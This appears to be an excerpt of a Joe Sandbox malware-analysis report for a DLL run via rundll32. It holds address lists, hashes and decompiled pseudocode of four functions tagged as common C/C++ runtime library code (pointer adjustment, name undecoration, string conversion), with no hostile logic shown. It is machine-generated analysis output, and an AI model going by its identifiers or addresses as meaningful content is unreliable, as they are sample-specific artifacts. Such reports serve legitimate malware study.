0x1002d495
0x1002d498
0x1002d49b
0x1002d49b
0x1002d4a0
0x1002d4a3
0x1002d4a6
0x00000000
0x00000000
0x1002d4af
0x1002d4b4
0x1002d4b7
0x1002d4b9
0x00000000
0x00000000
0x1002d4bd
0x1002d4bd
0x1002d4c0
0x1002d4c1
0x1002d4c1
0x1002d4c3
0x1002d4c6
0x00000000
0x00000000
0x1002d4c8
0x1002d4cb
0x1002d4d2
0x1002d4d5
0x1002d4d8
0x1002d4ed
0x1002d4ed
0x1002d4ed
0x1002d4da
0x1002d4da
0x1002d4dd
0x1002d4e7
0x1002d4e7
0x1002d4df
0x1002d4e2
0x1002d4e2
0x1002d4e9
0x1002d4e9
0x00000000
0x1002d4d8
0x1002d4cd
0x1002d4cd
0x1002d4cf
0x1002d4cf
0x1002d431
0x1002d431
0x1002d433
0x1002d4f0
0x1002d4f0
0x1002d4f2
0x1002d4f4
0x1002d4f7
0x1002d4f8
0x1002d4f9
0x1002d4fa
0x1002d502
0x1002d502
0x1002d504
0x1002d504
0x1002d507
0x1002d50a
0x1002d50d
0x1002d50f
0x1002d511
0x1002d511
0x1002d51e
0x1002d525
0x1002d52c
0x1002d52e
0x1002d537
0x1002d537
0x1002d53a
0x1002d53c
0x1002d53c
0x1002d53f
0x1002d542
0x1002d54e
0x1002d54e
0x1002d552
0x1002d555
0x1002d557
0x00000000
0x1002d544
0x1002d544
0x1002d54a
0x1002d54a
0x1002d558
0x1002d558
0x1002d55b
0x1002d55f
0x1002d560
0x1002d562
0x1002d564
0x1002d566
0x1002d590
0x1002d590
0x1002d592
0x1002d59f
0x1002d59f
0x1002d5a0
0x1002d5a1
0x1002d5a3
0x1002d5a5
0x1002d5aa
0x1002d5ac
0x1002d5b0
0x1002d5b3
0x1002d5b6
0x1002d5b8
0x1002d5b9
0x1002d5b9
0x1002d5bb
0x1002d5bb
0x1002d5bd
0x1002d5ca
0x1002d5ca
0x1002d5cb
0x1002d5cc
0x1002d5ce
0x1002d5cf
0x1002d5d0
0x1002d5d9
0x1002d5dc
0x1002d5de
0x1002d5df
0x1002d5df
0x1002d5e1
0x1002d5e1
0x1002d5e1
0x1002d5e4
0x1002d5e6
0x1002d5e9
0x1002d5eb
0x1002d5f1
0x1002d5f6
0x1002d5f6
0x1002d601
0x1002d601
0x1002d5bf
0x1002d5c1
0x00000000
0x00000000
0x1002d5c3
0x00000000
0x00000000
0x1002d5c5
0x1002d5c8
0x00000000
0x00000000
0x00000000
0x1002d5c8
0x1002d594
0x1002d596
0x00000000
0x00000000
0x1002d598
0x00000000
0x00000000
0x1002d59a
0x1002d59d
0x00000000
0x00000000
0x00000000
0x1002d59d
0x1002d568
0x1002d56d
0x1002d573
0x1002d573
0x1002d574
0x1002d575
0x1002d576
0x1002d578
0x1002d57d
0x1002d57f
0x1002d581
0x1002d586
0x1002d589
0x1002d58b
0x1002d58b
0x1002d58e
0x1002d58e
0x00000000
0x1002d58e
0x1002d56f
0x1002d571
0x00000000
0x00000000
0x00000000
0x1002d571
0x1002d546
0x1002d548
0x00000000
0x00000000
0x00000000
0x1002d548
0x1002d542
0x00000000
0x1002d433
0x1002d42f
0x1002d3e4
0x1002d3f0
0x1002d3f0
0x1002d3f2
0x1002d3f9
0x00000000
0x1002d3f9
0x1002d3f4
0x00000000
0x1002d3f4
0x1002d3a7
0x1002d3ad
0x1002d3ad
0x1002d3b0
0x1002d3b0
0x1002d3b1
0x00000000
0x1002d3b1
0x1002d3a9
0x1002d3ab
0x00000000
0x00000000
0x00000000
0x1002d3ab
0x1002d369
0x1002d36e
0x1002d370
0x1002d37d
0x1002d384
0x1002d386
0x1002d391
0x1002d391
0x1002d394
0x1002d396
0x1002d396
0x1002d39a
0x1002d372
0x1002d372
0x1002d372
0x00000000
0x1002d370
0x1002d321
0x1002d328
0x1002d329
0x1002d32b
0x00000000

APIs

_strrchr.LIBCMT ref: 1002D37D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction ID: 60edc47403ceb57e4c32773f528f628eab84e72a7bd41eb7e043d998d246c257
Opcode Fuzzy Hash: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction Fuzzy Hash: 68B19B719006969FDB01EF28D881BEEBBF5EF45344F6140ABE844DB241D674AE01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10005B62, Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10005B62() {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				void* _t58;
				void* _t61;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed char _t80;
				signed char _t83;
				signed char* _t84;
				signed char _t96;
				signed char* _t97;
				signed char* _t99;
				signed char* _t104;
				void* _t108;

				_push(0x10);
				_push(0x1004b018);
				E100040F0();
				_t74 = 0;
				_t52 =  *(_t108 + 0x10);
				_t80 = _t52[4];
				if(_t80 == 0 ||  *((intOrPtr*)(_t80 + 8)) == 0) {
					L30:
					_t53 = 0;
					goto L31;
				} else {
					_t96 = _t52[8];
					if(_t96 != 0 ||  *_t52 < 0) {
						_t83 =  *_t52;
						_t104 =  *(_t108 + 0xc);
						if(_t83 >= 0) {
							_t104 =  &(( &(_t104[0xc]))[_t96]);
						}
						 *(_t108 - 4) = _t74;
						_t99 =  *(_t108 + 0x14);
						if(_t83 >= 0 || ( *_t99 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t108 + 8));
							if((_t83 & 0x00000008) == 0) {
								if(( *_t99 & 0x00000001) == 0) {
									_t83 =  *(_t54 + 0x18);
									if(_t99[0x18] != _t74) {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											_t78 = 0;
											_t74 = (_t78 & 0xffffff00 | ( *_t99 & 0x00000004) != 0x00000000) + 1;
											 *(_t108 - 0x20) = _t74;
											goto L29;
										}
									} else {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											E1000D9E0(_t104, E1000558B(_t83,  &(_t99[8])), _t99[0x14]);
											goto L29;
										}
									}
								} else {
									if( *(_t54 + 0x18) == 0 || _t104 == 0) {
										goto L32;
									} else {
										E1000D9E0(_t104,  *(_t54 + 0x18), _t99[0x14]);
										if(_t99[0x14] == 4 &&  *_t104 != 0) {
											_push( &(_t99[8]));
											_push( *_t104);
											goto L21;
										}
										goto L29;
									}
								}
							} else {
								_t83 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x1004dfb0; // 0x0
							 *((intOrPtr*)(_t108 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x1004223c();
								_t83 =  *((intOrPtr*)(_t108 - 0x1c))();
								L12:
								if(_t83 == 0 || _t104 == 0) {
									L32:
									E10012120(_t74, _t83, _t96, _t104);
									asm("int3");
									_push(8);
									_push(0x1004b038);
									E100040F0();
									_t97 =  *(_t108 + 0x10);
									_t84 =  *(_t108 + 0xc);
									if( *_t97 >= 0) {
										_t101 =  &(( &(_t84[0xc]))[_t97[8]]);
									} else {
										_t101 = _t84;
									}
									 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
									_t105 =  *(_t108 + 0x14);
									_push( *(_t108 + 0x14));
									_push(_t97);
									_push(_t84);
									_t76 =  *((intOrPtr*)(_t108 + 8));
									_push( *((intOrPtr*)(_t108 + 8)));
									_t58 = E10005B62() - 1;
									if(_t58 == 0) {
										_t61 = E100069CC(_t101, _t105[0x18], E1000558B( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])));
									} else {
										_t61 = _t58 - 1;
										if(_t61 == 0) {
											_t61 = E100069DC(_t101, _t105[0x18], E1000558B( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])), 1);
										}
									}
									 *(_t108 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t61;
								} else {
									 *_t104 = _t83;
									_push( &(_t99[8]));
									_push(_t83);
									L21:
									 *_t104 = E1000558B();
									L29:
									 *(_t108 - 4) = 0xfffffffe;
									_t53 = _t74;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x10005b62
0x10005b64
0x10005b69
0x10005b6e
0x10005b70
0x10005b73
0x10005b78
0x10005c88
0x10005c88
0x00000000
0x10005b87
0x10005b87
0x10005b8c
0x10005b96
0x10005b98
0x10005b9d
0x10005ba2
0x10005ba2
0x10005ba4
0x10005ba7
0x10005bac
0x10005bce
0x10005bce
0x10005bd4
0x10005bf5
0x10005c34
0x10005c3a
0x10005c61
0x00000000
0x10005c67
0x10005c6c
0x10005c70
0x10005c71
0x00000000
0x10005c71
0x10005c3c
0x10005c3e
0x00000000
0x10005c44
0x10005c55
0x00000000
0x10005c5a
0x10005c3e
0x10005bf7
0x10005bfb
0x00000000
0x10005c09
0x10005c10
0x10005c1c
0x10005c26
0x10005c27
0x00000000
0x10005c27
0x00000000
0x10005c1c
0x10005bfb
0x10005bd6
0x10005bd6
0x00000000
0x10005bd6
0x10005bb3
0x10005bb3
0x10005bb8
0x10005bbd
0x00000000
0x10005bbf
0x10005bc1
0x10005bca
0x10005bd9
0x10005bdb
0x10005c9a
0x10005c9a
0x10005c9f
0x10005ca0
0x10005ca2
0x10005ca7
0x10005cac
0x10005caf
0x10005cb5
0x10005cbe
0x10005cb7
0x10005cb7
0x10005cb7
0x10005cc1
0x10005cc5
0x10005cc8
0x10005cc9
0x10005cca
0x10005ccb
0x10005cce
0x10005cd7
0x10005cda
0x10005d10
0x10005cdc
0x10005cdc
0x10005cdf
0x10005cf6
0x10005cf6
0x10005cdf
0x10005d15
0x10005d1f
0x10005d2b
0x10005be9
0x10005be9
0x10005bee
0x10005bef
0x10005c29
0x10005c30
0x10005c74
0x10005c74
0x10005c7b
0x10005c8a
0x10005c8d
0x10005c99
0x10005c99
0x10005bdb
0x10005bbd
0x00000000
0x00000000
0x00000000
0x10005b8c

APIs

___AdjustPointer.LIBCMT ref: 10005C29
___AdjustPointer.LIBCMT ref: 10005C4C
___AdjustPointer.LIBCMT ref: 10005CE8

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction ID: 31fa209adb8231de4210eaca4de771a1eb96de73e4b0f2c6b5dc5ef330e7e6b6
Opcode Fuzzy Hash: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction Fuzzy Hash: E351C075600706AFFB29CF10D881FAB77A4EF443D2F204529EC0596699EB32ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B1EA, Relevance: 6.2, APIs: 4, Instructions: 165
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E1000B1EA(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t54;
				void* _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t74;
				signed int _t82;
				signed int _t83;
				signed int _t86;
				void* _t95;
				char* _t101;
				char* _t102;
				char* _t107;
				signed int* _t109;

				_t100 = __ebx;
				_t101 =  *0x1004e004; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t54 =  *_t101;
				if(_t54 == 0) {
					L15:
					E10007662(_t101, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t57 = _t54 - 0x24;
				if(_t57 == 0) {
					_t58 =  *((intOrPtr*)(_t101 + 1));
					__eflags = _t58 - 0x24;
					if(_t58 == 0x24) {
						_t109 = _a8;
						_t101 = _t101 + 2;
						 *0x1004e004 = _t101;
						_t59 =  *_t101;
						__eflags = _t59 - 0x51;
						if(__eflags > 0) {
							_t60 = _t59 - 0x52;
							__eflags = _t60;
							if(_t60 == 0) {
								_t102 =  &_v12;
								_push( &_v20);
								__eflags =  *_t109;
								if( *_t109 == 0) {
									_v20 = "volatile";
									_v16 = 8;
								} else {
									_v20 = "volatile ";
									_v16 = 9;
								}
								E10007500(_t102);
								_t101 =  *0x1004e004; // 0x0
								L42:
								_push(3);
								L12:
								_v20 =  *_t109;
								 *0x1004e004 = _t101 + 1;
								_v16 =  *(_t109 + 4) | 0x00000100;
								_push( &_v20);
								_push( &_v12);
								_push(_a4);
								E1000B576(_t100);
								goto L17;
							}
							_t69 = _t60 - 1;
							__eflags = _t69;
							if(_t69 == 0) {
								_t43 = _t101 + 1; // -1
								 *0x1004e004 = _t43;
								L37:
								_t71 = _a4;
								 *((intOrPtr*)(_t71 + 4)) = 0;
								 *((char*)(_t71 + 4)) = 2;
								 *_t71 = 0;
								return _t71;
							}
							_t72 = _t69 - 1;
							__eflags = _t72;
							if(_t72 == 0) {
								_t34 = _t101 + 1; // -1
								 *0x1004e004 = _t34;
								_t74 = _t109;
								__eflags =  *_t74;
								if( *_t74 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E1000723E(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E10007615(_t101, _a4,  &_v20, _t74);
								goto L16;
							}
							__eflags = _t72 - 5;
							if(__eflags != 0) {
								goto L37;
							}
							_t33 = _t101 + 1; // -1
							 *0x1004e004 = _t33;
							E1000BBAD(0, __eflags, _a4);
							L6:
							goto L17;
						}
						if(__eflags == 0) {
							goto L42;
						}
						_t82 = _t59;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L15;
						}
						_t83 = _t82 - 0x41;
						__eflags = _t83;
						if(_t83 == 0) {
							_t31 = _t101 + 1; // -1
							 *0x1004e004 = _t31;
							E1000A54C(_a4, _t109);
							L5:
							goto L6;
						}
						_t86 = _t83 - 1;
						__eflags = _t86;
						if(_t86 == 0) {
							_t29 = _t101 + 1; // -1
							 *0x1004e004 = _t29;
							E1000B409(__ebx, _t109, _a4, _t109, 1);
							goto L16;
						}
						__eflags = _t86 != 1;
						if(_t86 != 1) {
							goto L37;
						}
						_t22 = _t101 + 1; // -1
						_v20 = 0;
						 *0x1004e004 = _t22;
						_v16 = 0;
						E10008D42(_a4, E10009403(_t101,  &_v12, _t109, 0,  &_v20, 0));
						goto L17;
					}
					__eflags = _t58;
					if(_t58 != 0) {
						goto L37;
					}
					goto L15;
				}
				_t109 = _a8;
				_t95 = _t57 - 0x1d;
				if(_t95 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t95 == 1) {
					_t107 =  &_v12;
					_push( &_v20);
					__eflags =  *_t109;
					if( *_t109 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E10007500(_t107);
					_t101 =  *0x1004e004; // 0x0
					goto L11;
				}
				E10008D42(_a4, _t109);
				goto L5;
			}

0x1000b1ea
0x1000b1f0
0x1000b1f9
0x1000b1fc
0x1000b202
0x1000b204
0x1000b29d
0x1000b2a5
0x1000b2aa
0x1000b2ad
0x00000000
0x1000b2ad
0x1000b20a
0x1000b20d
0x1000b28e
0x1000b291
0x1000b293
0x1000b2b3
0x1000b2b6
0x1000b2b9
0x1000b2bf
0x1000b2c2
0x1000b2c5
0x1000b33b
0x1000b33b
0x1000b33e
0x1000b3d1
0x1000b3d4
0x1000b3d5
0x1000b3d7
0x1000b3e9
0x1000b3f0
0x1000b3d9
0x1000b3d9
0x1000b3e0
0x1000b3e0
0x1000b3f7
0x1000b3fc
0x1000b402
0x1000b402
0x1000b262
0x1000b265
0x1000b270
0x1000b276
0x1000b27c
0x1000b280
0x1000b281
0x1000b284
0x00000000
0x1000b289
0x1000b344
0x1000b344
0x1000b347
0x1000b3b5
0x1000b3b8
0x1000b3bd
0x1000b3bd
0x1000b3c0
0x1000b3c3
0x1000b3c7
0x00000000
0x1000b3c7
0x1000b349
0x1000b349
0x1000b34c
0x1000b368
0x1000b36b
0x1000b370
0x1000b372
0x1000b374
0x1000b39d
0x1000b3a4
0x1000b3ab
0x00000000
0x1000b3ab
0x1000b37a
0x1000b385
0x1000b38c
0x00000000
0x1000b38c
0x1000b34e
0x1000b351
0x00000000
0x00000000
0x1000b356
0x1000b359
0x1000b35e
0x1000b226
0x00000000
0x1000b226
0x1000b2c7
0x00000000
0x00000000
0x1000b2cd
0x1000b2cd
0x1000b2cf
0x00000000
0x00000000
0x1000b2d1
0x1000b2d1
0x1000b2d4
0x1000b329
0x1000b32c
0x1000b331
0x1000b225
0x00000000
0x1000b225
0x1000b2d6
0x1000b2d6
0x1000b2d9
0x1000b316
0x1000b319
0x1000b31e
0x00000000
0x1000b31e
0x1000b2db
0x1000b2de
0x00000000
0x00000000
0x1000b2e4
0x1000b2e7
0x1000b2eb
0x1000b2f8
0x1000b306
0x00000000
0x1000b30b
0x1000b295
0x1000b297
0x00000000
0x00000000
0x00000000
0x1000b297
0x1000b20f
0x1000b212
0x1000b215
0x1000b260
0x1000b260
0x00000000
0x1000b260
0x1000b21a
0x1000b22f
0x1000b232
0x1000b233
0x1000b235
0x1000b247
0x1000b24e
0x1000b237
0x1000b237
0x1000b23e
0x1000b23e
0x1000b255
0x1000b25a
0x00000000
0x1000b25a
0x1000b220
0x00000000

APIs

shared_ptr.LIBCMT ref: 1000B255
operator+.LIBVCRUNTIME ref: 1000B2A5
operator+.LIBVCRUNTIME ref: 1000B38C
shared_ptr.LIBCMT ref: 1000B3F7

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction ID: 93e7bdd40a4f091c83d39b0a35ead360230e477b65409987ed75284ff6752577
Opcode Fuzzy Hash: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction Fuzzy Hash: F8517D7180495AEFEB00CFA8C945AAE7BF4FB053C0F20856AE81997219D776DB41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1000A248, Relevance: 6.1, APIs: 4, Instructions: 144
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000A248(signed int* _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				void* _t46;
				intOrPtr _t47;
				signed int* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t57;
				char* _t60;
				char* _t62;
				signed int* _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				signed int _t80;
				intOrPtr _t87;
				intOrPtr* _t88;
				signed int _t89;
				signed int _t91;
				signed int _t94;

				_t87 =  *0x1004e004; // 0x0
				_t88 = _t87 + 1;
				 *0x1004e004 = _t88;
				_t74 =  *_t88;
				_t94 = 0;
				_t70 = _t74;
				_v12 = 0;
				_t91 = 0;
				_v8 = 0;
				_t46 = _t70 - 0x41;
				if(_t46 == 0) {
					if(_a16 != 0) {
						L32:
						_t42 = _t88 + 1; // 0x1
						_t47 = _t42;
						L33:
						 *0x1004e004 = _t47;
						_t48 = _a4;
						_t48[1] = _t94;
						L34:
						 *_t48 = _t94;
						L35:
						return _t48;
					}
					_t49 = _a8;
					if( *_t49 == 2 ||  *_t49 == 3) {
						 *_t49 = 5;
						goto L31;
					} else {
						if( *_t49 != 1) {
							goto L32;
						}
						 *_t49 = 4;
						L31:
						_t88 =  *0x1004e004; // 0x0
						goto L32;
					}
				}
				_t50 = _t46 - 1;
				if(_t50 == 0) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E10008798( &_v12, 0x3e);
						L24:
						_t53 =  *0x1004e004; // 0x0
						_t47 = _t53 + 1;
						goto L33;
					}
					L22:
					_t48 = _a4;
					_t48[1] = _t94;
					_t48[1] = 2;
					goto L34;
				}
				if(_t50 == 1) {
					 *_a8 = 5;
					goto L24;
				}
				if(_t74 == 0) {
					L19:
					E100072DE(_a4, 1);
					_t48 = _a4;
					goto L35;
				}
				_t57 =  *((intOrPtr*)(_t88 + 1));
				if(_t57 == 0) {
					goto L19;
				}
				if(_a16 != 0) {
					goto L22;
				}
				_t5 = _t70 - 0x30; // -48
				_t6 = _t88 + 2; // 0x3
				 *0x1004e004 = _t6;
				_t73 = _t57 + 0xffffffd0 + (_t5 << 4);
				if(_t57 + 0xffffffd0 + (_t5 << 4) > 1) {
					E10008798( &_v12, 0x2c);
					_t69 = E100076A6( &_v12,  &_v28, E100073B4( &_v20, _t73, 0));
					_t94 =  *_t69;
					_t91 = _t69[1];
				}
				_v20 = _t94;
				_v16 = _t91;
				E100077F7( &_v20, 0x3e);
				_t60 =  *0x1004e004; // 0x0
				_t89 = _v20;
				_t80 = _v16;
				_v12 = _t89;
				_v8 = _t80;
				if( *_t60 != 0x24) {
					_v16 = _t80;
					_v20 = _t89;
					E100077F7( &_v20, 0x5e);
					_t89 = _v20;
					_t80 = _v16;
					_t62 =  *0x1004e004; // 0x0
					_v12 = _t89;
					_v8 = _t80;
				} else {
					_t62 = _t60 + 1;
					 *0x1004e004 = _t62;
				}
				if( *_t62 == 0) {
					if(_t80 <= 1) {
						if(_t89 == 0) {
							E10007596( &_v12, 1);
						} else {
							E10006F36( &_v12, 0x100438b4);
						}
						_t89 = _v12;
						_t80 = _v8;
					}
				} else {
					 *0x1004e004 = _t62 + 1;
				}
				_t48 = _a4;
				 *_t48 = _t89;
				_t48[1] = _t80 | 0x00004000;
				goto L35;
			}

0x1000a24e
0x1000a254
0x1000a256
0x1000a25d
0x1000a25f
0x1000a261
0x1000a267
0x1000a26a
0x1000a26c
0x1000a26f
0x1000a272
0x1000a3be
0x1000a3e6
0x1000a3e6
0x1000a3e6
0x1000a3e9
0x1000a3e9
0x1000a3ee
0x1000a3f1
0x1000a3f4
0x1000a3f4
0x1000a3f6
0x1000a3fa
0x1000a3fa
0x1000a3c0
0x1000a3c6
0x1000a3da
0x00000000
0x1000a3cd
0x1000a3d0
0x00000000
0x00000000
0x1000a3d2
0x1000a3e0
0x1000a3e0
0x00000000
0x1000a3e0
0x1000a3c6
0x1000a278
0x1000a27b
0x1000a395
0x1000a3ab
0x1000a3ae
0x1000a3b3
0x1000a3b3
0x1000a3b8
0x00000000
0x1000a3b8
0x1000a397
0x1000a397
0x1000a39a
0x1000a39d
0x00000000
0x1000a39d
0x1000a284
0x1000a38a
0x00000000
0x1000a38a
0x1000a28c
0x1000a378
0x1000a37d
0x1000a382
0x00000000
0x1000a382
0x1000a292
0x1000a297
0x00000000
0x00000000
0x1000a2a0
0x00000000
0x00000000
0x1000a2a6
0x1000a2af
0x1000a2b5
0x1000a2ba
0x1000a2bf
0x1000a2c6
0x1000a2dd
0x1000a2e2
0x1000a2e4
0x1000a2e4
0x1000a2ec
0x1000a2ef
0x1000a2f2
0x1000a2f7
0x1000a2fc
0x1000a2ff
0x1000a302
0x1000a308
0x1000a30b
0x1000a315
0x1000a31d
0x1000a320
0x1000a325
0x1000a328
0x1000a32b
0x1000a330
0x1000a333
0x1000a30d
0x1000a30d
0x1000a30e
0x1000a30e
0x1000a339
0x1000a346
0x1000a34d
0x1000a35d
0x1000a34f
0x1000a354
0x1000a354
0x1000a362
0x1000a365
0x1000a365
0x1000a33b
0x1000a33c
0x1000a33c
0x1000a368
0x1000a371
0x1000a373
0x00000000

APIs

DName::DName.LIBVCRUNTIME ref: 1000A2D0

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 1000A2DD
DName::operator=.LIBVCRUNTIME ref: 1000A35D
DName::DName.LIBVCRUNTIME ref: 1000A37D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction ID: 4432753ead1cd1f4d13ab9af0bf177137c14a2538a54f020a321214d9f530d75
Opcode Fuzzy Hash: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction Fuzzy Hash: 1D519E74D04255DFEB05CF58CA80A9EBBF4FB46380F10829AF9159B259D7B0AF80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100269CF, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100269CF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E10028BDD(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E10028BDD(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t19 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E10027754(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E10024468(GetLastError());
						return  *((intOrPtr*)(E1002449E(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E10027754(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E10027720(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x100269d6
0x100269db
0x100269f9
0x100269fb
0x100269fe
0x10026a2b
0x10026a33
0x10026a35
0x10026a4e
0x10026a51
0x10026a54
0x10026a62
0x10026a71
0x10026a79
0x10026a7b
0x10026a94
0x10026a97
0x10026a97
0x10026a7d
0x10026a84
0x10026a8f
0x10026a8f
0x10026a99
0x00000000
0x10026a99
0x10026a59
0x10026a5e
0x10026a60
0x00000000
0x00000000
0x00000000
0x10026a60
0x10026a3e
0x00000000
0x10026a49
0x10026a00
0x10026a03
0x10026a06
0x10026a19
0x10026a1c
0x100269ef
0x100269ef
0x00000000
0x100269f2
0x10026a0c
0x10026a11
0x10026a13
0x10026a9d
0x10026a9d
0x00000000
0x10026a13
0x100269dd
0x100269e2
0x100269e7
0x100269e9
0x100269ec
0x00000000

APIs

Part of subcall function 10027720: _free.LIBCMT ref: 1002772E

